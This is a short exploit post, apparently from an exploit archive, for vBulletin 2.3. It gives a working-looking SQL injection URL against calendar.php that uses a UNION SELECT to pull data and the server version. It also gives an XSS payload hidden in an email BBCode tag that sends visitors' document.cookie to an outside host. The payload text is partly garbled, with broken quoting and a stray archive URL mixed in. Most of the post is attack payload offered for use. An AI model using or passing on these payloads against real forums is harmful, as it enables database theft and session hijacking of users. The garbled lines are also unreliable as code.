# Title: vbulletin Vulnerability versions 2.3 .* - SQL injection.# Author: Discovered by ROOT_EGY# Version: vBulletin Version 2.3===========================================================
www.sec-war.com
===========================================================
Vulnerability versions 2.3.*- SQL injection in the validation of input data in'calendar.php'. Sends SQL requests to the server.
For example:
www.server.som/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies, public, userid,'0000-0-0 ', version (), userid FROM calendar_events WHERE eventid =14) order by eventdate
Vulnerability to Version 2.*.*-is introducing XSS script tag e-mail
[E * MAIL] aaa@aaa.aa » 's ='[/ E * MAIL]'sss =» i = new Image (); i.src ='https://www.exploit-db.com/exploits/11396/ http://antichat.ru/cgi-bin/s . jpg? '+ document.cookie; this.sss = null »style = top: expression (eval(this.sss));===========================================================
ROOT_EGYto connect: r0t@hotmail.es
===========================================================
Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.===========================================================